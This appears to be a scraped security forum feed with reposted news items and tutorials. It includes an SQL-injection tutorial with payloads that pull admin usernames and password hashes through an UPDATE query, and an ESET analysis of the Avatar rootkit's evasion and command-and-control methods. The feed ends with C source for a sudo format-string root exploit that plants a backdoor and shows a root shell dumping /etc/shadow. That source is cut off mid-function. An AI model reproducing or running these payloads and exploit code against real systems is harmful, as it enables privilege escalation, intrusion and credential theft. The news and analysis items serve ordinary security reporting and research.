Drivers Could Allow Elevation Of Privilege (2840221) This security update resolves three privately reported vulnerabilities in Microsoft Windows. The vulnerabilities could allow elevation of privilege if an attacker logs on to the system and runs a specially crafted application. An attacker must have valid logon credentials and be able to log on locally to exploit these vulnerabilities.[/TD] [TD]Important Elevation of Privilege[/TD] [TD]Requires restart[/TD] [TD]Microsoft Windows [/TD] [/TR] [/TABLE] Sursa: Microsoft Security Bulletin Summary for May 2013
-
[h=3]SQL Injection With Update Query[/h]We have wrote couple of articles discussing various techniques and attack vectors for SQL Injection, We have already discussed Basic SQL Injection With Union Based, Blind SQL Injection, Time Based SQL Injection and also discussed common problems and their solutions related to SQL Injection. However, this time Daniel Max a regular reader of RHA will discuss about exploiting SQL Injection with Update Query. Most of the tutorials, You see on the web usually explains to use the SELECT method in order to retrieve stuff from the database, But what if we wanted to update some thing that is already present in the database, For example a MD5 hash, that we are not able to crack, In order to gain access to the admin panel, We would simply run a update query and it will automatically update the password. We recommend you to atleast read little bit about MYSQL from w3schools.com, before proceeding with this tutorial as this tutorial is not for complete beginners. Requirements Tamper Data Burp Suite Know how of MySQL (w3schools.com recommended) So, Below is a screenshot of the form which we want to update, What we want to update is the Email address with our SQL Injection. Vulnerable parameter is "E-mail format: " value.We would use Tamper data to intercept and change the values. Here is a screenshot: After we click ok we get an error the following error: First we want to find the exact database version, but what would be the easiest way. We can set value for other parameters, MySQL will let us do that as long as that parameter is one of UPDATE query parameters. We will use "fname" , which is string value. Database query output will be shown inside "First name" input box (where it says MaXoNe). Screenshot of version query: Screenshot of the rendered content with database answer: Now that we know how to create our query, lets get the tables. Full query: html' , fname = (select group_concat(table_name) from information_schema.tables where table_schema = database()) , phone = ' Tables Query: Screenshot of the rendered content with database answer: Three tables, strange !? Lets check that again.We use count. Full query: html' , fname = (select count(table_name) from information_schema.tables where table_schema = database()) , phone = ' Screenshot of get tables count query: Screenshot of the rendered content with database answer: Now is time for Burp intruder.Set browser to use 127.0.0.1 and 8080 for all URLs. We use Burp Suite intruder with 'Attack type' "Sniper" and 'Payload type' "Numbers" Full query: html' , fname = (select concat(table_name) from information_schema.tables where table_schema = database() limit 0,1) , phone = ' Screenshot of burp settings: Thats it. And now you just get columns the same way with Burp Suite. Full query: html' , fname = (select concat(column_name) from information_schema.columns where table_name = 0x61646d696e73 limit n,1) , phone = ' Just increment n with Burp Suite. Values : Full query: html' , fname = (select concat(user,0x3a,pass) from admins limit n,1) , phone = ' Just increment n with Burp Suite. That's it , simple and yet effective . I used this because , waf blocked -- and --+ so I wasn't able to close and comment out query. About The Author This article has been written by Daniel Max, He is a security researcher from Bosnia, He is willing to actively contribute to RHA. Sursa: http://www.rafayhackingarticles.net/2013/05/sql-injection-with-update-query.html
-
[h=1]VirusTotal now analyzing Your Network Traffic[/h]Posted by: FastFlux May 2, 2013 The popular VirusTotal service, which was recently bought out by Google and can run more than 20 anti-virus scanners over a sample in one pass, can now also look for traces of malware infections in captured network traffic. To perform a check, users upload network packets that are captured in the common PCAP format instead of sending VirusTotal the more traditional suspicious EXE, PDF or HTML file. Such network traffic dumps can be created with sniffers like Wireshark or tcpdump. VirusTotal will extract all transmitted files and present them to the familiar virus scanners; registered users will also receive copies of the extracted files. The scan service also looks at the network traffic data with the Snort and Suricata intrusion detection systems. These services can, for instance, detect the communication between a botnet client and its command & control server, as well as other typical attack patterns. The analysis that VirusTotal executes can, in essence, also be performed by manually running each scanner one by one. The new analysis feature isn’t aimed at amateur users – who will likely not make much of messages such as “NETBIOS SMB-DS DCERPC NetrpPathCanonicalize request (possible MS06-040)” – but for administrators and security specialists, it provides a very quick way of extracting useful information. Originally posted: The H: Open Source, Security and Development Sursa: VirusTotal now analyzing Your Network Traffic | ZeroSecurity
-
[h=1]Internet Explorer 10 beats Chrome and Firefox for blocking malware, says analyst report[/h] Internet Explorer 10 beats both Google’s Chrome and Firefox when it comes to blocking malware downloads, according to analysts NSS Labs. The company’s tests using 754 samples of real-world infected links found that Microsoft’s browser was far ahead of its competitors. The tests found that Internet Explorer 10 offered a mean malware block rate of 99.96%, with Chrome in second with a mean block rate of 83.16%. “Safari and Firefox, with mean malware block rates of 10.15% and 9.92% respectively, provided negligible protection but were still more than five times more effective than Opera, which blocked only 1.87% of the malware in this test,” said the company in its report. The tests were conducted over a period of 28 days, with 550 “test runs” per browser against URLs containing malware, according to NSS Labs. The products under test were Apple Safari 5, Google Chrome 25/26, Microsoft Internet Explorer 10, Mozilla Firefox 19 and Opera 12. “As the first line of defense against malware infection, browsers must provide a strong layer of protection,” the company says. “NSS tested the effectiveness of five leading web browsers against 754 samples of real-world malicious software, and the results show significantly differing protection capabilities.” “For every ten web encounters with socially engineered malware, Firefox and Safari users will be protected from approximately one attack. Nine out of ten browser malware encounters will test the defenses of installed anti-*virus or other operating system defenses,” the report says. “By contrast, Chrome users will be protected from eight out of ten such attacks, and Internet Explorer 10 users will be protected from all but about 4 out of 1,000 socially engineered malware attacks.” Sursa: Internet Explorer 10 beats Chrome and Firefox for blocking malware, says analyst report
-
HTP Zine 5 I have to admit, i really like their work, just keep being so creative guys,hacking&exposing websitet that offer vulnerability researching is fun,with fun i mean when a security firm cant afford security to itself,there are plenty of vulnerable websites which offer malware scanning,web application vulnerability researching etc, even big ones. ???????????????????????????????????????????????????????????????????????????????? ????????? ???????????????????????????????????????? > Intro ? ? ???????????????????????????????????????? > MIT/EDU ???? ??? ???????????????????????????????????????? > Linode ? ? ??? ???????????????????????????????? ??? > Nmap ? ?????????? ??? ?? ?? ?? ?? ??? ??? ? ?? ?? ?? ??? > Sucuri ????? ? ??? ?? ?? ?? ?? ??? ??? ? ?? ?? ?? ??? > NIST NVD ? ??? ? ??? ???????????????????????????????? ??? > Wireshark ? ??? ? ??? ________________________________ ??? > Art ? ??????? ??? HTP____________________MWTB_DLTR ??? > Zerodays ???????? ? ???????????????????????????????????????? > Outro ? ????? ????? ?????????????????????????? ????? > See reverse for ? ????? ???? ???????????????????????????? ???? > HTP4 ? ? ???????? ???????????????????????????????????????????????????????????????????????????????? The Zine : Vulnerability analysis, Security Papers, Exploit Tutorials Sursa: Security-Hooligan: HTP Zine 5
-
HTML 5 Good Practice Guide Authored by Tim Brown | Site portcullis-security.com This document is not intended to be a definitive guide, but more of a review of specific security issues resulting from the use of HTML 5. Download: http://packetstormsecurity.com/files/download/121664/HTML5GPG.pdf Sursa: HTML 5 Good Practice Guide ? Packet Storm
-
Nasa buys into 'quantum' computer By Alex Mansfield BBC Radio Science Unit The machine does not fit the conventional concept of a quantum computer, but makes use of quantum effects A $15m computer that uses "quantum physics" effects to boost its speed is to be installed at a Nasa facility. It will be shared by Google, Nasa, and other scientists, providing access to a machine said to be up to 3,600 times faster than conventional computers. Unlike standard machines, the D-Wave Two processor appears to make use of an effect called quantum tunnelling. This allows it to reach solutions to certain types of mathematical problems in fractions of a second. Is quantum computing possible? Effectively, it can try all possible solutions at the same time and then select the best. Google wants to use the facility at Nasa's Ames Research Center in California to find out how quantum computing might advance techniques of machine learning and artificial intelligence, including voice recognition. The gate model... is the single worst thing that ever happened to quantum computing” University researchers will also get 20% of the time on the machine via the Universities Space Research Agency (USRA). Nasa will likely use the commercially available machine for scheduling problems and planning. Canadian company D-Wave Systems, which makes the machine, has drawn scepticism over the years from quantum computing experts around the world. Until research outlined earlier this year, some even suggested its machines showed no evidence of using specifically quantum effects. Quantum computing is based around exploiting the strange behaviour of matter at quantum scales. Most work on this type of computing has focused on building quantum logic gates similar to the gate devices at the basis of conventional computing. But physicists have repeatedly found that the problem with a gate-based approach is keeping the quantum bits, or qubits (the basic units of quantum information), in their quantum state. "You get drop out… decoherence, where the qubits lapse into being simple 1s and 0s instead of the entangled quantum states you need. Errors creep in," says Prof Alan Woodward of Surrey University. One gate opens... Instead, D-Wave Systems has been focused on building machines that exploit a technique called quantum annealing - a way of distilling the optimal mathematical solutions from all the possibilities. Geordie Rose believes others have taken the wrong approach to quantum computing Annealing is made possible by physics effect known as quantum tunnelling, which can endow each qubit with an awareness of every other one. "The gate model... is the single worst thing that ever happened to quantum computing", Geordie Rose, chief technology officer for D-Wave, told BBC Radio 4's Material World programme. "And when we look back 20 years from now, at the history of this field, we'll wonder why anyone ever thought that was a good idea." Dr Rose's approach entails a completely different way of posing your question, and it only works for certain questions. But according to a paper presented this week (the result of benchmarking tests required by Nasa and Google), it is very fast indeed at finding the optimal solution to a problem that potentially has many different combinations of answers. In one case it took less than half a second to do something that took conventional software 30 minutes. A classic example of one of these "combinatorial optimisation" problems is that of the travelling sales rep, who needs to visit several cities in one day, and wants to know the shortest path that connects them all together in order to minimise their mileage. The D-Wave Two chip can compare all the possible itineraries at once, rather than having to work through each in turn. Reportedly costing up to $15m, housed in a garden shed-sized box that cools the chip to near absolute zero, it should be installed at Nasa and available for research by autumn 2013. US giant Lockheed Martin earlier this year upgraded its own D-Wave machine to the 512 qubit D-Wave Two. Sursa: BBC News - Nasa buys into 'quantum' computer
-
Microsoft Cybersecurity Essay Contest Are you a student with great ideas on the future of cyber security policy? Have you conducted research on how to measure the security impact of policies around the world? If so, read on for how you can win $5,000 cash for your research in this essay contest. [h=2]Overview[/h] Cybersecurity is a policy priority for many governments but there is limited understanding of whether and how policy choices impact cyber risk outcomes. While many countries have made significant investments in the development and implementation of cybersecurity policy regimes, cybercriminals continue to make headway. With that in mind, policymakers are left to question the impact of their policy investments. Given this unknown, many policymakers have struggled to choose policies that will have the greatest positive outcome in managing cyber risk. At the same time, the cyber ecosystem is undergoing tremendous change. The growth in Internet users across Asia, Africa, and Latin America; the proliferation of connected devices; and the explosive rise in Internet traffic are just a few of the mega-trends reshaping the Internet. Accordingly, regardless of today’s policy challenges and solutions, tomorrow’s landscape is likely to present new risks and opportunities. [h=2]What is the contest?[/h] Microsoft is looking for original research about these cybersecurity policy challenges from university students at any stage in their educational development. Specifically, research should address one or both of the following questions; in both instances, preference will be given to responses that integrate quantitative analysis using publically-available cybersecurity data and research, such as the Microsoft Security Intelligence Report (SIR): Which cybersecurity policy choices have the most impact on cybersecurity outcomes and, based upon your answer, are there “actionable” recommendations for policymakers? For example, have national-level regimes for securing government networks had a meaningful impact on cybersecurity? How might those regimes be improved? Additionally, for example, can cybersecurity policies impact user-level security? And if so, how? [*] Given the growth in people, devices, and data connected to the Internet, how should policymakers adapt current approaches, and are there elements missing from the current policy landscape that should be created, or existing instruments that should be deprecated? For example, many global-level cybersecurity policy regimes were created when most Internet users were based on North America and Europe; will the rise in Internet users in Asia, Africa, and Latin America require changes to these regimes? Additionally, for example, cybersecurity policies have been optimized for a desktop-centric world, where the computing machine, their operating systems, and often their users were fixed within a geography. What changes are necessary to accommodate a more mobile-based world? [h=2]What prizes are offered?[/h] Microsoft will award cash prizes for the top three essays according to the judging criteria: 1st place - $5,000 2nd place - $3,000 3rd place - $2,000 [h=2]Where can I get more details?[/h] For more information, please see the Official Rules. Also, visit the Microsoft Global Security Strategy and Diplomacy website to learn how this team works collaboratively with governments, multilateral organizations, industry, and non-profit groups to enhance security across the cyberecosystem. [h=2]How do I enter?[/h] To enter, send an email to cyber-essay@microsoft.com with your essay in Microsoft Word format and include the following information: first name, last name, email address, and school / university. Entries must be received by 11:59 p.m. Pacific Time (PT) on June 14, 2013. Sursa: Cybersecurity | Microsoft Global Security Strategy and Diplomacy
-
Colectie 10982 fisiere malware .pdf (170 CVE-2013-0640 MiniDuke).
Nytro replied to h4sh's topic in Exploituri
Da, mai facuse tipa inca un astfel de pack. -
Vreau si eu sa il vad
-
Alt topic cu certuri de cacat? Muie _|_
-
No, sa ma fut pe ei de copii prosti. Am fost plecat, am fost si eu beat ca tot romanu de sarbatori, nu stau sa banez IP-uri.
-
DVD X Player 5.5.3.7 Pro & Standard (SEH) Buffer Overflow
Nytro replied to neox's topic in Exploituri
Hmm, nu ar fi frumos un tutorial cap-coada detaliat? -
#include <string> using namespace std; string FOLOSITI_BA_STRING = "OBIECTE";
-
[h=1]Bullguard Internet Security 2013 – 90 de zile licenta GRATUITA[/h] By Radu FaraVirusi(com) on May 1, 2013 BullGuard, producatorul danez de securitate a lansat versiunea 13 (2013) a produsului BullGuard Internet Security, ce inglobeaza tehnologia antivirus de la BitDefender si firewall de la Outpost. Cu rezultate excelente in teste si cu o protectie foarte buna, il puteti avea acum in mod gratuit timp de 3 luni de zile. Pentru a avea BullGuard Internet Security 2013, versiunea finala cu 3 luni licenta GRATUITA accesati site-ul: https://www.bullguard.com/landing-pages/aff/general50ooff90days.aspx Sursa: Bullguard Internet Security 2013 – 90 de zile licenta GRATUITA
-
[h=1]With the Rise of Coding, Comes the Rise of Malware[/h] I’m sure you might have read recent articles about how coding is going to be the ultimate skill in the coming years. Seems like this might as well be true, so it’s being pushed with the various online schools being developed (the list is getting exhaustive). With this huge rise of training comes a huge rise of smarter hackers and malware writers. What is it about malware that seems so attractive? Money, fun, damage, etc.? We can get a glimpse of reality when we see the statistics on antivirus vendor websites, some say a million new samples are added weekly. Many of these issues arise out of the violence of society or the outward shame that is inflicted upon other people through the art of cyberbullying, hacking, and other threatening tasks. What’s more is that when we study these aspects, we get a sense that most malware is targeting our wallets, stealing our identities. We need better protection. This is a call to someone who can make better, user friendly operating systems. If you know how to code or are training, please make sure to use it for good. You could in fact become a lot more rich making top security software than becoming a hacker – stealing and risking it all. What’s better for you? Helping or hurting? Good wallet or prison time? Make your choice. Better humanity through an act of good will. Get out there and code for the good! Make a difference! BE THE DIFFERENCE! Don’t be afraid to try new things. Set impossible goals. Shoot yourself into the future of technology and skyscrape the world over with your amazing new security software. Something’s gotta give! And if something doesn’t happen soon, our threatening internet culture could begin to control us and steal our money. We’ll have a very unfair world by then. What if we impose CISPA? That’ll make a lot of people happy but also a lot of people mad. Sursa: With the Rise of Coding, Comes the Rise of Malware | Secure Connexion
-
[h=1]Spyware used by governments poses as Firefox, and Mozilla is angry[/h][h=2]Mozilla sends cease and desist letter to maker of FinFisher software.[/h] by Jon Brodkin - May 1 2013, 7:41pm GTBDT That's not the real Firefox, either. Nayu Kim Mozilla has sent a cease-and-desist letter to a company that sells spyware allegedly disguised as the Firefox browser to governments. The action follows a report by Citizen Lab, which identifies 36 countries (including the US) hosting command and control servers for FinFisher, a type of surveillance software. Also known as FinSpy, the software is sold by UK-based Gamma International to governments, which use it in criminal investigations and allegedly for spying on dissidents. Mozilla revealed yesterday in its blog that it has sent the cease and desist letter to Gamma "demanding that these illegal practices stop immediately." Gamma's software is "designed to trick people into thinking it's Mozilla Firefox," Mozilla noted. (Mozilla declined to provide a copy of the cease and desist letter to Ars.) The spyware doesn't infect Firefox itself, so a victim's browser isn't at risk. But the spyware "uses our brand and trademarks to lie and mislead as one of its methods for avoiding detection and deletion" and is "used by Gamma’s customers to violate citizens’ human rights and online privacy," Mozilla said. Mozilla continues: Through the work of the Citizen Lab research team, we believe Gamma’s spyware tries to give users the false impression that, as a program installed on their computer or mobile device, it’s related to Mozilla and Firefox, and is thus trustworthy both technically and in its content. This is accomplished in two ways: 1. When a user examines the installed spyware on his/her machine by viewing its properties, Gamma misrepresents its program as “Firefox.exe” and includes the properties associated with Firefox along with a version number and copyright and trademark claims attributed to “Firefox and Mozilla Developers.” 2. For an expert user who examines the underlying code of the installed spyware, Gamma includes verbatim the assembly manifest from Firefox software. The Citizen Lab research team has provided us with samples from the following three instances that demonstrate how this misuse of our brand, trademarks and public trust is a designed feature of Gamma’s spyware products and not unique to a single customer’s deployment: A spyware attack in Bahrain aimed at pro-democracy activists; The recent discovery of Gamma’s spyware apparently in use amidst Malaysia’s upcoming General Elections; and A promotional demo produced by Gamma. Each sample demonstrates the exact same pattern of falsely designating the installed spyware as originating from Mozilla. Gamma’s own brochures and promotional videos tout one of the essential features of its surveillance software is that it can be covertly deployed on the person’s system and remain undetected. The Citizen Lab report provides pictorial evidence of the impersonation: FinFisher doesn't just masquerade as Firefox. The Citizen Lab report says it has also been used to target Malay language speakers by "masquerading as a document discussing Malaysia’s upcoming 2013 General Elections." The countries where Citizen Lab identified FinFisher command-and-control servers are Australia, Austria, Bahrain, Bangladesh, Brunei, Bulgaria, Canada, Czech Republic, Estonia, Ethiopia, Germany, Hungary, India, Indonesia, Japan, Latvia, Lithuania, Macedonia, Malaysia, Mexico, Mongolia, Netherlands, Nigeria, Pakistan, Panama, Qatar, Romania, Serbia, Singapore, South Africa, Turkey, Turkmenistan, United Arab Emirates, United Kingdom, United States, and Vietnam. We've asked Gamma if the company has a response to Mozilla's cease and desist letter but haven't heard back yet. Sursa: http://arstechnica.com/information-technology/2013/05/spyware-used-by-governments-poses-as-firefox-and-mozilla-is-angry/
-
[h=1]Mysterious Avatar rootkit with API, SDK, and Yahoo Groups for C&C communication[/h] The story of the mysterious malware detected by ESET as Win32/Rootkit.Avatar began in February 2013 when some adverts for this rootkit leaked from Russian cybercrime forums (http://pastebin.com/maPY7SS8). This information produced some heated discussions in the malware research community, however a sample of the Avatar rootkit was not found and published, until now. In this blog we present an in-depth analysis of the Win32/Rootkit.Avatar family, which has some surprising features, and is currently available for sale or rent in the crimeware marketplace. In March ESET detected two droppers with different C&C’s and compilation time stamps: Win32/Rootkit.Avatar uses a driver infection technique twice: the first in the dropper so as to bypass detections by HIPS, and the second in the rootkit driver for surviving after system reboot. The infection technique is restricted in its capability (by code signing policy for kernel-mode modules) and Win32/Rootkit.Avatar works only on x86 systems. We already analyzed in detail, some years ago, how the TDL3 rootkit family also infected system drivers so as to survive after reboot (TDL3: The Rootkit of All Evil?). Before 64-bit versions of Microsoft Windows became so prevalent, operating system tricks for infection using system drivers were really popular in rootkits. But the need for bypassing code signing policy has brought in a new generation of bootkits. More details about the complex bootkit family Win32/Gapz were presented a few weeks ago in our research whitepaper “Mind the Gapz: The most complex bootkit ever analyzed?”. [h=3]The Droppers[/h] The first level dropper implements LZMA decompression for the second level dropper and the malicious driver module. The second level dropper and driver are unique in every instance because the first level dropper generates random names for mutexes/events and enforces modifications directly in the body of the modules. The most interesting trick used in the first level dropper is an anti-debugging technique based on time comparison from the KUSER_SHARED_DATA.InterruptTime system structure. The first level dropper modifies the RtlDispatchException() routine inside the KiUserExceptionDispatcher() body. The next step raises an exception and passes control to the exception-handler: The current time is collected from the KUSER_SHARED_DATA.InterruptTime system structure and compared during the next steps of execution. This non-standard trick can detect emulation or debugging at the first stages of dropper execution. The second level dropper also has checks for known virtual machine software. But these checks are based on standard, already-known tricks. Before the code for VM checking is executed it is decrypted by XOR based encryption using the key “explorer”. At the next steps the operating system version and current user privileges level are checked. The second level dropper uses two ways of escalating privilege: Exploitation of the MS11-080 vulnerability COM Elevation (UAC whitelist) The system infection process by dropper works as presented in the following diagram: The exploit for the MS11-080 vulnerability uses the same exploitation code as a public exploit from Metasploit Framework with minor changes. After a version check for afd.sys the dropper uses the following exploitation code: The next figure presents the code which triggers an AFDJoinLeaf pointer overwrite by sending a specific IOCTL code = 0x000120BB: The most interesting part of the exploit code is the steps taken after exploitation. After a successful exploitation kernel-mode shellcode will be executed for loading the malicious driver. The Avatar rootkit driver is not stored on the hard drive and loads only from a memory region. Here’s the call graph for the routine that loads the malicious driver: Another way to escalate privilege is to use an old technique based on COM Elevation (UAC whitelist). Upon successful escalation, the system directory (%WINDIR%\system32\drivers) is checked, searching for the driver following the infection. After successful infection the GsDriverEntry() routine is modified to execute the following malicious code stub. The modified GsDriverEntry() routine code looks like this: One of the main tasks of the malicious code stub is to attach itself to the second level dropper process and read the Avatar rootkit driver body in memory. The malicious code stub as presented in the following figure: After a successful infection, the modified driver will copy itself to the %TEMP% directory and try to load itself using standard system techniques (Service Control Manager or ZwLoadDriver()). So the Avatar rootkit driver is not stored on the hard drive and will load with the same code used in the method for MS11-080 exploitation for driver execution (see the call graph load_avatar_driver routine above). This method for loading the Avatar rootkit driver by system driver infection is effective for bypassing security software, and loads other kernel-mode modules from a “trusted” (but malicious) system driver. [h=3]Avatar rootkit driver[/h] After successfully loading the Avatar rootkit driver, Avatar executes an algorithm for infecting system drivers so as to survive after reboot. In order to perform its infection, Avatar randomly chooses a driver and checks its name against a blacklist that varies for every Windows versions. The execution flow for an infected system driver looks like this: 1. At the entry point, the following stub code is executed: 2. Then, the GUID_DEVINTERFACE_DISK callback routine is installed into the system driver to loaded the Avatar rootkit driver from the hidden file storage. This is the same technique used by TDL3, TDL4 ( The Evolution of TDL: Conquering x64) and Olmasco (MaxSS/SST). 3. The original code is restored in memory: The Avatar rootkit driver is able to infect several system drivers without changing the original driver’s file size. The Avatar rootkit driver implements an interesting technique to detect the presence of a virtual machine environment. The driver module calls the MmMapIoSpace() routine from the driver to read BIOS data at address 0xF0000 and check for some specific strings: Parallels Software Virtual Machine VirtualBox QEMU BIOS VMware Bochs Additional checks were also found for KVM and Hyper-V based on tricks already known using cpuid instructions. The hidden file system is used to store the user-mode payload module and additional files. All files are encrypted with a custom symmetric cipher. Here’s the call graph for the routine that communicates with the hidden file system: The attributes for files stored in the hidden file system look like this: On the infected machine, additional user-mode and kernel-mode modules can be downloaded and executed that are stored in the hidden file storage. Win32/Rootkit.Avatar does not store malicious components in any standard NTFS storage, except for infected system drivers. The combination of encrypted hidden file storage and infected system drivers make it harder to use typical forensics approaches to investigate an infection by Win32/Rootkit.Avatar. The user-mode payload code injection uses the KeInitializeApc() routine to initialize an APC user-mode object and schedules the execution of this thread into the system process address space. [h=3]Win32/Rootkit.Avatar Payload[/h] The version of the payload from the sample currently researched sample of Win32/Rootkit.Avatar doesn’t have many interesting features. Its main functionalities are: command center communications parsing configuration information read/write into hidden file storage communicating with the rootkit driver installing additional user-mode and kernel-mode modules Of course, this means the initial infection can be the starting point of a variety of malicious activities based on the modules that deployed. In our case the payload component avcmd.dll was injected into svchost.exe system process which started communicating with C&C IP addresses stored in the configuration file. This configuration file has the following structure: name of the botnet command center URLs 1024-bit key for custom encryption algorithm RSA-1024 public key Name of process for the subsequent code injection Examples of decrypted configuration information from two different droppers are shown here: and here: In order to protect communications with the command center, a custom encryption algorithm is used, which output is base64-encoded. All network communications are done from user-mode and use standard WinINet API functions. Win32/Rootkit.Avatar has an additional way of communicating with the C&C if the other methods are not working correctly. The payload tries to search for messages in Yahoo groups using special parameters. Search sequences are based on the following parameter (in our case 17BTN1 and 17NET1): After strings are concatenated, the resulting byte sequence is encrypted using a custom algorithm with a 1024-bit key from the configuration file. BTN1 key = 6mQ98EXP3v7TKMdk704uOUzGqvikuoHt98n8IPp4K19 a3qyZ96LoOc54sb3g9eJVyAs7VmPxQjkkM9R960ev275K24PQ550K1 9fNk8305jRDUTb4cEut4579Zg9i32qU NET1 key = E623J5XKJ9NF4bseM5J2nkwhs1K2766DUOMUDSee3c 7xu06Q9QayV61U4fm5H89ppuNgLt9M5D2XTCLcd0aS3m9CO1aZg9h9 o2zb2EIC437IU3X1P3ec07481E0j2Tdr After encryption the resulting string is encoded with a base64 algorithm, after which all letters are converted to upper case and some symbols are filtered out. An example for botnet BTN1 looks like this: SymFilter(UpperCase(Base64(Encrypt(17BTN1)))) = EZTFDHWP EZTFDHWP is used for the subsequent search request on Yahoo groups. If the search request is successful, the next step is to check the group number and read the group description data. The group description is encrypted with an RSA algorithm and a 1024-bit private key. It is possible to decrypt this data with the public key stored in the configuration file. We suppose this information is to be found in the encrypted message used for returning control for a botnet without an active C&C. After we identified this functionality, we started to search for possible messages on the Yahoo groups web site. Only one group was found with the relevent parameters (11BTN1 = EFS9KHRF). The search request looks like this: Yahoo! Groups: Search Results An encrypted message is present in this group’s description: We were able to decrypt this message using the known RSA-1024 public keys from the configuration information. The key from the BTN1 botnet successfully decrypted this message: dZ8FsJ4z0::http://www.avatarbut.info http://www.avatarsbut.info This information looks similar to C&Cs found in the BTN1 botnet configuration information. The authors of this blog post suspect that this Yahoo group was created to test this communication functionality because it includes the same information already present in the BTN1 configuration file. Avatar’s scheme to maintain botnet control via Yahoo groups messages provide an excellent protection against sinkhole attemps, because information about C&C’s domains is encrypted using an asymmetric algorithm based on the RSA scheme. In the reversing process, researchers can only extract the public key to decrypting messages: this key can’t be used to encrypt new messages to create bogus groups. [h=3]Avatar Runtime Library[/h] Win32/Rootkit.Avatar has a special API for developing additional components without the source code of the Avatar rootkit. This development process is based around the Avatar Runtime Library, a special SDK for developing additional user-mode components which allow communication with the Avatar rootkit driver. The Avatar Runtime Library has the following API functions: aTakeProcessToken() – assign process token from one process to other aExecute() – execute custom module in the context of remote process aLoadDriver() – load driver from hidden file system aLoadFileFromAvatarDisk() – read file from hidden file system aSaveFileOrAttrToAvatarDisk() – write file into hidden file system aSendReport() – send the specific report to C&C The storage structure for payload injection into the user-mode process looks like this: After analysis of the Avatar Runtime Library SDK it seems like a development project by a really skilled system developer or developers. We think that the malware developers worked on it for not less than half year because many kernel-mode techniques need lengthy testing to ensure stability. [h=3]Conclusion[/h] Win32/Rootkit.Avatar is an interesting rootkit family using many interesting techniques for bypassing detection by security software. Rootkits at the level of sophistication of Avatar or Gapz can be used for long term infection by the system executing the attack. Avatar does not store its files in the standard file system and its technique for driver infection makes it harder for typical forensic approaches to be used for successful incident investigation. Avatar also has additional ways to restore botnet control if the command center is taken down or C&C is disrupted for other reasons. For cleaning it’s necessary first to deactivate the Avatar rootkit driver and user-mode payload, and only then is it possible to clean or restore the infected system driver. Anton Cherepanov, Malware Researcher Aleksandr Matrosov, Security Intelligence Team Lead SHA1 hashes for analyzed samples: Dropper1 (BTN1 botnet) – b2b3bb4b7c5a050a583246a8abe5a79d723b8b57 Dropper2 (NET1 botnet) – 93473126a9aa13834413c494ae5f62eec1016fde Sursa: The mysterious Avatar rootkit
-
1,677,721,600,000,000 ways to encode <script> Screenshot: https://twitter.com/soaj1664ashar/status/329107647087403009/photo/1 Paper: https://t.co/KMgpnS63RD
-
sudo_debug 1.8.0-1.8.3p1 format string root exploit /* death-star.c sudo v1.8.0-1.8.3p1 (sudo_debug) format string root exploit + glibc FORTIFY_SOURCE bypass by aeon - http://infosecabsurdity.wordpress.com/ This PoC exploits: - CVE-2012-0864 - FORTIFY_SOURCE format string protection bypass via "nargs" integer overflow - CVE-2012-0809 - sudo v1.8.0-1.8.3p1 "sudo_debug" format string Tested on: - Fedora core 16 verne - glibc 2.14.90.14 release - sudo 1.8.1p2 Notes: - This exploit actually turned out very reliable - You can make a cleaner version of this exploit if you smash sudo_debug function pointer or a libc function pointer so you dont write to disk. I wont be releasing that version References and thanks too: - http://seclists.org/fulldisclosure/2012/Jan/att-590/advisory_sudo.txt - http://www.vnsecurity.net/2012/02/exploiting-sudo-format-string-vunerability/ - http://www.alertlogic.com/modern-userland-linux-exploitation-courseware/ - "A Eulogy for Format Strings" http://www.phrack.org/issues.html?issue=67&id=9&mode=txt [aeon@localhost tmp]$ gcc death-star.c -o death-star [aeon@localhost tmp]$ ./death-star [+] Targeting release: 3.1.0-7.fc16.i686.PAE [+] Found vuln glibc version: 2.14.90 [+] Found a vuln sudo version: 1.8.1 [+] Writing backdoor: e.c [+] Compiling backdoor: e [+] Writing SUDO_ASKPASS file: e.sh [+] Press enter when ready... < -------------- REMOVED --------------> AAF@F@F@F@F@' from LD_PRELOAD cannot be preloaded: ignored. %1073825311%21372736 %: settings: = %1073825311%21372736 %: settings: = %1073825311%21372736 %: sudo_mode 1081383169 Sorry, try again. Sorry, try again. Sorry, try again. %20$08n %*482$ %*2850$ %1073741824$: 3 incorrect password attempts %1073886251%21372736 %: policy plugin returns 1081402445 [+] Getting root..! [+] Cleaning system. [+] Launching root shell! sh-4.2# id; uname -a uid=0(root) gid=1001(aeon) groups=0(root),1001(aeon) context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023 Linux localhost.localdomain 3.1.0-7.fc16.i686.PAE #1 SMP Tue Nov 1 20:53:45 UTC 2011 i686 i686 i386 GNU/Linux sh-4.2# head -n1 /etc/shadow root:$6$YxDB.SNvtnqhtt.T$slIOJSl7Lz07PtDF23m1G0evZH4MXvpo1VNebUUasM/je2sP6FXi2Y/QE1Ntg.93jOtTQOfZ8k2e/HhT8XzXN/:15818:0: 99999:7::: sh-4.2# */ #include <sys/resource.h> #include <sys/utsname.h> #include <gnu/libc-version.h> #include <stdlib.h> #include <unistd.h> #include <stdio.h> #include <sys/time.h> #include <sys/stat.h> #include <string.h> #include <sys/wait.h> #define OFFSET 65000 #define NUM_THREADS 0 /* files that we create on disk */ #define BACKDOOR "e.c" #define BD_COMPILED "e" #define SUDO_ASKPASS "e.sh" extern char **environ; struct utsname ver; void *kill_sudo(); void *pop_shell(); void *set_env(); int is_glibc_vuln(); int is_sudo_vuln(); int write_backdoor(); /* hardcoded path to sudo */ const char sudo[] = "/usr/bin/sudo\0"; char s_version[20]; /* vuln versions of sudo */ char vuln_sudo_versions[4][20] = { {"1.8.0"}, {"1.8.1"}, {"1.8.2"}, {"1.8.3"} }; /* vuln versions of glibc */ char vuln_glibc_versions[4][20] = { {"2.14.90"}, }; int main(int argc, char *argv[]) { struct rlimit rara; int status; char ready; uname(&ver); printf("[+] Targeting release: %s\n", ver.release); if (is_glibc_vuln()){ if(is_sudo_vuln()){ if (write_backdoor()){ printf("[+] Press enter when ready..."); scanf("%c", &ready); }else{ exit(0); } }else{ exit(0); } }else{ exit(0); } // ulimited stack rara.rlim_max = rara.rlim_cur = -1; setrlimit(RLIMIT_STACK, &rara); pid_t pid; if((pid = fork()) < 0) { printf("[-] An error occurred while forking sudo\n"); return -1; } else if(pid == 0){ set_env(); kill_sudo(); }else{ wait(&status); if (WIFEXITED(status)) { sleep(1); pop_shell(); } } } int is_glibc_vuln(){ int i, returnval = -1; for (i = 0; i < 4; i++){ if (strcmp(gnu_get_libc_version(), vuln_glibc_versions[i]) == 0){ printf("[+] Found vuln glibc version: %s\n", gnu_get_libc_version()); returnval = 1; } } return 